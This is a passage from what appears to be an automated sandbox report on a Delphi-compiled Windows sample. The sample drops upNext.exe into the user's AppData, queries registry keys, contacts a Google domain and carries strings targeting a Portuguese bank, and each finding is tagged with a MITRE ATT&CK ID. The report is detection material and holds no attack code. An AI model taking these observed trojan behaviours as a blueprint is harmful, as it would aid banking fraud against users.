private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-jEh1wEb3A49VAwtiiAy-UA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:13:04 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2cQErozT7d0yRHFORaat60atDMfCcAL8NFzEU8ErTHqjKFMFCGkCcw; expires=Tue\n 05-Aug-2025 09:13:04 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=gTNkgy2BQtTq1vDC4vCwvXfmhKmPBwBPvCfDrCPb0oePB4IAM_e0KERH7Q6cJQEQNIIEqeFU3oifZp_2E8GaIcizUfeOwS0TgWEKx9i8Ldefs_OYsOjUMEsSGDmPXYQuuM20kZYyZPeXOJamER7T8HViAZD-lD8yIRAWuE8QCR36nmxBZwHw9KO7rDGZk1LBD2CRr5kyO4QscQ; expires=Fri\n 08-Aug-2025 09:13:04 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-qeY08AEOKq5zV4uGh9M5CA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:13:05 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2cJamddwOP4CfEoT6wWlwkrtKjZ5JrpjvLBCWIPkI18miVfbWB0gv0; expires=Tue\n 05-Aug-2025 09:13:05 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=Rs6GSXJky8vlmlZmct_G7KnChP1nClbRzuyhIiOg4TifqvsQApYDJIlBkii-rpMscYXGznC6bbrJGLOeKKtoH_fLHjVSo0GqBwSKx5HAIKBfsGdMb6KJ3yDNvUCjSzwT1vVFwj73EuUsWhe1-U8Wdf9OWDdLM7wLytgXPqYK3bmuyNfhxAEVRxbfhfxzOfgxJBFLS9-Og5sjTQ; expires=Fri\n 08-Aug-2025 09:13:05 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"upNext.exe\" with commandline \"--i\" (UID: 00000000-00004788)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-0", "type": 7, "relevance": 1, "name": "Contacts domains", "description": "\"www.google.com.br\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"www.google.com.br\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"upNext.exe\" with commandline \"--i\" (UID: 00000000-00004788)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"upNext.exe\" (UID: 00000000-00004788) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"upNext.exe\" (UID: 00000000-00004788) was launched with modified environment variables: \"PSModulePath, PATHEXT\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462\" was detected as \"Borland Delphi\" and name: \"Compiler\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp\" was detected as \"Borland Delphi\" and name: \"Compiler\"\n \"upNext.tmp\" was detected as \"Borland Delphi\" and name: \"Compiler\"\n \"DISMHOST.EXE.67A482A2.bin\" was detected as \"Borland Delphi\" and name: \"Compiler\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"DISMHOST.EXE.67A482A2.bin\" has flags like IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462\" has an executable section named \"CODE\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp\" has an executable section named \"CODE\"\n \"upNext.tmp\" has an executable section named \"CODE\"\n \"DISMHOST.EXE.67A482A2.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462\" has an writable section named \"DATA\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462\" has an writable section named \"BSS\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462\" has an writable section named \".idata\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462\" has an writable section named \".tls\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp\" has an writable section named \"DATA\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp\" has an writable section named \"BSS\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp\" has an writable section named \".idata\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp\" has an writable section named \".tls\"\n \"upNext.tmp\" has an writable section named \"DATA\"\n \"upNext.tmp\" has an writable section named \"BSS\"\n \"upNext.tmp\" has an writable section named \".idata\"\n \"upNext.tmp\" has an writable section named \".tls\"\n \"DISMHOST.EXE.67A482A2.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"DISMHOST.EXE.67A482A2.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-23", "type": 2, "relevance": 2, "name": "Detected known bank URL artifact", "description": "\"bes.pt\" (Source: 00000000-00004224.00000001.68784.00390000.00000004.mdmp, 00000000-00004224.00000002.70707.00390000.00000004.mdmp, 00000000-00004224.00000003.76237.00390000.00000004.mdmp, Indicator: \"bes.pt\")\n \"bes.pt|axb|tpl.asp\" (Source: 00000000-00004224.00000001.68784.00390000.00000004.mdmp, 00000000-00004224.00000002.70707.00390000.00000004.mdmp, 00000000-00004224.00000003.76237.00390000.00000004.mdmp, Indicator: \"bes.pt\")\n \"bes.pt\" (Source: 00000000-00004788.00000001.78276.00370000.00000004.mdmp, Indicator: \"bes.pt\")\n \"bes.pt|axb|tpl.asp\" (Source: 00000000-00004788.00000001.78276.00370000.00000004.mdmp, Indicator: \"bes.pt\")", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462\" was detected as \"Borland Delphi 4.0\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp\" was detected as \"Borland Delphi 4.0\"\n \"upNext.tmp\" was detected as \"Borland Delphi 4.0\"\n \"DISMHOST.EXE.67A482A2.bin\" was detected as \"Visual C++ 2005 Release -> Microsoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"upNext.exe\" - Location: [%LOCALAPPDATA%\\upNext.exe]- [targetUID: 00000000-00004224]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to access non-existent file \"C:\\version.dll\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to access non-existent file \"C:\\wsock32.dll\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to access non-existent file \"C:\\SHFolder.dll\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to access non-existent file \"C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.ENU.DLL\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to access non-existent file \"C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.EN.DLL\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to access non-existent file \"C:\\olepro32.dll\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to access non-existent file \"C:\\DNSAPI.dll\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to access non-existent file \"C:\\IPHLPAPI.DLL\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to access non-existent file \"C:\\rasadhlp.dll\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" reads file \"c:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" reads file \"c:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" reads file \"c:\\windows\\fonts\\staticcache.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\\ASSEMBLYSTORAGEROOTS\"; Key: \"\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to touch file \"C:\\version.dll\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to touch file \"C:\\Windows\\system32\\version.dll\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to touch file \"C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe.Local\\\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\\comctl32.dll\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to touch file \"C:\\wsock32.dll\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to touch file \"C:\\Windows\\system32\\wsock32.dll\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to touch file \"C:\\SHFolder.dll\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to touch file \"C:\\Windows\\system32\\SHFolder.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to access non-existent file \"C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe.Local\\\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to access non-existent file \"C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.ENU\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to access non-existent file \"C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.EN\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" trying to access non-existent file \"\\Device\\RasAcd\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" connecting to \"\\ThemeApiPort\"\n \"upNext.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" writes file \"c:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\upnext.exe\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" writes file \"%localappdata%\\upnext.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"4044E30F0188BBC151EA29B345D47E3586028F949905C97DCE6E0343F1818462\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\"; Value: \"\")\n 